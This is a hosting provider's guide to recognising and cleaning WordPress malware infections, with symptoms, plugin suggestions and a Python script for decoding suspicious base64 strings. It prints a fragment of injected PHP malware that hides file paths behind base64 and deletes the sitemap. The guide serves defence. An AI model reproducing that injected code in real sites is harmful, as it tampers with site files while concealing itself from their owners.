WordPress is the most widely used CMS in the world. This means its updates, plugins, and other tools receive more support compared to other platforms.
 
Because it is by far the most widely used CMS, it is also the most targeted. Therefore, it is quite common to encounter an infected WordPress installation.
 
If we use an outdated version of WordPress or if any of our plugins are not fully up to date, they may contain security vulnerabilities. As a result, malicious code may be injected into our website files.
 
To properly analyze our site, we must distinguish between the two types of infections that can affect WordPress:
 
File infections, usually within the theme or plugins. Some file infections spread, while others do not.
Database infections, which occur when malware is directly injected into the WordPress database.
 
In this guide, we will show a series of symptoms that your website may experience if it has been infected. These are general examples, as there are many different types of infections. We will focus on file infections, since they are much more common and generic. Database infections are better analyzed on a case-by-case basis.
 
 
IMPORTANT: Keeping your plugins fully updated does not guarantee hosting security. Keeping WordPress and its plugins updated minimizes these risks and helps prevent infections caused by known vulnerabilities, but it does not guarantee 100% protection against code injection.
 
Infected files
 
First of all, let’s explain how to detect infected files. In many cases, they can be identified just by the file name, which usually contains meaningless and suspicious characters. They are often .php files. Here are two examples:
 
ffkoklhu.php
e6b6m5ju.php
 
Not all infected files are so obvious, as in many cases the infection is injected into existing website files. Below is an example of injected code, but keep in mind that the code and infection types can vary greatly. Here is a sample:
 
//ckIIbg
$nowHtacFile = base64_decode("Li8uaHRhY2Nlc3M=");
$nowIndexFile = base64_decode("Li9pbmRleC5waHA=");
$bkLocalFileIndex1 = './wp-includes/images/smilies/icon_devil.gif';
$bkLocalFileHtac1 = './wp-includes/images/smilies/icon_crystal.gif';
$sitemap = base64_decode("Li9zaXRlbWFwLnhtbA==");
@unlink($sitemap);
 
In this example, we can see the use of base64_decode and other random-looking names (such as Li9pbmRleC5waHA or //ckIIbg) that do not appear to have a legitimate origin.
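
The strings passed to base64_decode in the sample become readable once decoded, which shows which files the injected code touches. The Python triage helper below is an added example, not part of the original guide or of any cdmon tool; the function names and the list of risky calls are assumptions chosen for illustration.

```python
import base64
import binascii
import re
from pathlib import Path

# base64_decode("...") or base64_decode('...') called on a string literal
B64_CALL = re.compile(r"""base64_decode\(\s*(["'])([A-Za-z0-9+/=]+)\1\s*\)""")
# File-altering PHP calls; a leading "@" suppresses PHP error output
RISKY_CALL = re.compile(r"@?\b(unlink|file_put_contents|chmod|rename)\s*\(")

def decode_literals(php_source):
    """Return (encoded, decoded) pairs for every base64_decode literal."""
    found = []
    for match in B64_CALL.finditer(php_source):
        encoded = match.group(2)
        try:
            decoded = base64.b64decode(encoded, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            decoded = None  # not valid base64: review by hand
        found.append((encoded, decoded))
    return found

def triage(php_source):
    """Report what the code hides behind base64 and which risky calls it makes."""
    risky = sorted({m.group(1) for m in RISKY_CALL.finditer(php_source)})
    return {"decoded": decode_literals(php_source), "risky_calls": risky}

def scan_tree(root):
    """Triage every .php file under root; return only files with findings."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        report = triage(path.read_text(errors="replace"))
        if report["decoded"]:
            hits[str(path)] = report
    return hits

# Constructed input: the injected sample from this guide, embedded to run offline
SAMPLE = '''//ckIIbg
$nowHtacFile = base64_decode("Li8uaHRhY2Nlc3M=");
$nowIndexFile = base64_decode("Li9pbmRleC5waHA=");
$bkLocalFileIndex1 = './wp-includes/images/smilies/icon_devil.gif';
$bkLocalFileHtac1 = './wp-includes/images/smilies/icon_crystal.gif';
$sitemap = base64_decode("Li9zaXRlbWFwLnhtbA==");
@unlink($sitemap);
'''

if __name__ == "__main__":
    for encoded, decoded in triage(SAMPLE)["decoded"]:
        print(f"{encoded} -> {decoded}")
```

Running scan_tree on a copy of the site's files lists every PHP file that hides string literals behind base64_decode. Legitimate plugins also call that function, so each hit still needs manual review.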
 
IMPORTANT: Keep in mind that modifying critical website files may affect its functionality. We recommend being cautious when removing lines of code or contacting a web developer to review the code.
 
You can also use the following Google tool to check whether unsafe content has been detected on your hosting:
 
 
Redirection to unwanted pages
 
This may occur when trying to access your WordPress homepage or when clicking internal links that automatically redirect to an external or malicious website.
 
It is very likely that there is a code infection in one of your website files.
 
How to solve the issue: As mentioned above, in most cases this redirection is due to direct code injection into a web file. A full file analysis must be carried out to remove the code generating the redirection. File analysis tools can help, but if they fail to detect the infection, manual code review will be necessary.
 
We recommend installing the Wordfence plugin to regularly scan your website.
 
At cdmon, we provide backups from the last 15 days so you can restore your website to a version prior to the code injection.
 
Spam indexing in Google
 
It is quite common for a website to appear with spam content when searched directly in Google. Below is an example searching for example.com:
 
 
To quickly check whether this is only a Google indexing issue, perform the same search in another search engine, such as Bing:
 
 
If it only happens in Google, it is likely a Google indexing issue. In that case, access Google Search Console and request reindexing of your domain.
 
IMPORTANT: If this occurs across all search engines, perform a full web file and database analysis to detect possible SEO-related code injection.
 
Website design not displaying correctly
 
This symptom can be more difficult to detect, as layout issues may also be caused by compatibility problems or recent changes.
 
Infections affecting website display can vary greatly. Many are caused by installed themes.
 
Themes downloaded from unreliable sources may contain injected malicious code.
 
To fix this, review the web files and the database to identify the injected code causing the malfunction.
 
How can we prevent it? At cdmon, we recommend installing the following plugins as preventive measures:
 
We recommend using TAC (Theme Authenticity Checker), which scans installed theme files and detects suspicious code:
 
Plugin information page: https://wordpress.org/plugins/tac/
 
We also recommend using Wordfence to analyze web files:
 
 
 
Automatically created WordPress users
 
Sometimes unauthorized users may appear in the WordPress admin panel. Below is an example:
 
 
Recommendations: Update WordPress and plugins, run a security scan, and change your MySQL password.
 
If you change the MySQL password, remember to update it in the wp-config.php file.
 
Webmail sending disabled or spam comments
 
If your website sends spam emails, cdmon’s anti-spam system may temporarily disable web-based email sending.
 
Outdated contact forms or missing CAPTCHA validation are common causes. Installing reCAPTCHA and using Akismet can help prevent spam.
 
Temporary hosting suspension
 
You may occasionally see a suspension message when accessing your website:
 
 
This is a message from cdmon, meaning it is generated by the server.
 
It appears when a service has expired or when malware has been detected on your hosting account. In such cases, you will receive an email notification with further details.
 

For more information, you can contact us.